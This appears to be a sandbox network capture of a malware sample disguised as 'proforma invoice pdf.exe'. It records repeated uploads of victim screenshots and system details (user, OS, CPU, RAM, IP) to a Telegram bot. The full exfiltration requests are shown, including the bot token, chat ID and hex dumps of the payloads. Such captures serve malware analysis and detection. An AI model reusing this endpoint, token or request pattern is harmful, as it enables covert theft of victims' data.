2025-01-08 11:33:17 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:17 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 38 63 31 62 61 34 38 39 36 64 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd48c1ba4896da--
2025-01-08 11:33:17 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:17 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138006,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335997,"document":{"file_name":"user-116938 2025-02-09 04-25-04.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbFmd-Yn2rlhLokLccm8s0ScNR08khAAJXFgACPzjxU7FPTp_5nmj5AQAHbQADNgQ","file_unique_id":"AQADVxYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbFmd-Yn2rlhLokLccm8s0ScNR08khAAJXFgACPzjxU7FPTp_5nmj5AQAHbQADNgQ","file_unique_id":"AQADVxYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxZnfmJ9q5YS6JC3HJvLNEnDUdPJIQACVxYAAj848VOxT06f-Z5o-TYE","file_unique_id":"AgADVxYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 02/09/2025 04:05:03\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49735	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:19 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd52c0fe788e99 Host: api.telegram.org Content-Length: 77464 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:33:19 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:19 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 32 63 30 66 65 37 38 38 65 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 32 63 30 66 65 37 38 38 65 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 31 2f 32 30 32 35 20 32 31 3a 33 34 3a 35 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd52c0fe788e99Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd52c0fe788e99Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/21/2025 21:34:59User
2025-01-08 11:33:19 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:19 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:19 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:19 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:33:19 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:19 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 32 63 30 66 65 37 38 38 65 39 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd52c0fe788e99--
2025-01-08 11:33:20 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:20 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138007,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336000,"document":{"file_name":"user-116938 2025-02-21 21-45-01.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbF2d-YoCHaZjNzB7frih4REJZqPM8AAJYFgACPzjxU9mfxKbzcHMtAQAHbQADNgQ","file_unique_id":"AQADWBYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbF2d-YoCHaZjNzB7frih4REJZqPM8AAJYFgACPzjxU9mfxKbzcHMtAQAHbQADNgQ","file_unique_id":"AQADWBYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxdnfmKAh2mYzcwe364oeERCWajzPAACWBYAAj848VPZn8Sm83BzLTYE","file_unique_id":"AgADWBYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 02/21/2025 21:34:59\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49736	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:22 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd557f758a7aac Host: api.telegram.org Content-Length: 77464 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:33:22 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:22 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 35 37 66 37 35 38 61 37 61 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 35 37 66 37 35 38 61 37 61 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 35 2f 32 30 32 35 20 30 39 3a 32 33 3a 32 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd557f758a7aacContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd557f758a7aacContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/25/2025 09:23:27User
2025-01-08 11:33:22 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:22 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:22 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:22 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:33:22 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:22 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 35 37 66 37 35 38 61 37 61 61 63 2d 2d 0d 0a Data Ascii: -----------------------------8dd557f758a7aac--
2025-01-08 11:33:23 UTC	1488	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:23 GMT Content-Type: application/json Content-Length: 1099 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138008,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336003,"document":{"file_name":"user-116938 2025-02-25 09-33-27.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbGGd-YoMQC-12uXbiNax64OVG5xoAA1kWAAI_OPFTtn1AuIbL1BgBAAdtAAM2BA","file_unique_id":"AQADWRYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbGGd-YoMQC-12uXbiNax64OVG5xoAA1kWAAI_OPFTtn1AuIbL1BgBAAdtAAM2BA","file_unique_id":"AQADWRYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxhnfmKDEAvtdrl24jWseuDlRucaAANZFgACPzjxU7Z9QLiGy9QYNgQ","file_unique_id":"AgADWRYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 02/25/2025 09:23:27\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49737	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:27 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd58c988529d68 Host: api.telegram.org Content-Length: 77464 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:33:27 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:27 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 38 63 39 38 38 35 32 39 64 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 38 63 39 38 38 35 32 39 64 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 31 2f 32 30 32 35 20 31 33 3a 35 31 3a 31 34 0a 55 73 65 72 Data Ascii: -----------------------------8dd58c988529d68Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd58c988529d68Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/01/2025 13:51:14User
2025-01-08 11:33:27 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd 